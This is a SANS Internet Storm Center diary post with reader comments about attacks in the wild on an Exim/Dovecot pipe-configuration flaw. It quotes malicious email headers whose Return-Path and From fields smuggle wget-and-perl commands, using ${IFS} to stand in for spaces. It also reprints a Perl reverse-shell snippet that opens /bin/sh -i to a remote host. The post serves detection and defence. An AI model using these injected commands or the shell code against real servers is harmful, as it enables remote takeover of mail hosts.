Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Dovecot / Exim Exploit Detects SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Dovecot / Exim Exploit Detects

Sometimes it doesn't take an IDS to detect an attack, but just reading your e-mail will do. Our read Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

The actual exploit happens in the "Return-Path" line. If exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail devliery agent Dovecot which implements a pop3 and imap server. Sadly, the sample configuration provided to configure Dovecot with Exim passes the string the attacker provided as "MAIL FROM" in the e-mail envelope as a shell parameter without additional validation.

The first script ("exim") is a little one liner shell connecting to port 9 on (reformated for redability)

use Socket;
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
exec("/bin/sh -i");};

The second script  first retrieves a perl script, and then executes it. The perl script does implement a simple IRC client connecting to on port 3303 (right now, this resolves to, but is not responding on port 3303)

For more details, see the writeout by RedTeam Pentesting [2]


Johannes B. Ullrich, Ph.D.
SANS Technology Institute

I will be teaching next: Defending Web Applications Security Essentials - SANS Cyber Defense Initiative 2021


4304 Posts
ISC Handler
Jul 29th 2013
Quick addition: the {IFS} string replaces the white space. iFS is the Unix environment variable for the separator.

4304 Posts
ISC Handler
Hi Guys,

shortly after Heise report this ( the Server behind ( got shutting down by the Hoster (Strato).

Mon, 29 Jul 2013 17:57:01 +0200 (CEST) i got a new mail ...
Received: from domain.local (unknown [])
for <postmaster@localhost>; Mon, 29 Jul 2013 17:56:35 +0200 (CEST)
Date: Mon, 29 Jul 2013 17:57:01 +0200 (CEST)
From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`
To: undisclosed-recipients:;
1 Posts
The use of IFS is weird. The default value of IFS is the string containing: a space followed by a tab and then a newline.
Would have expected something more like


146 Posts

Sign Up for Free or Log In to start participating in the conversation!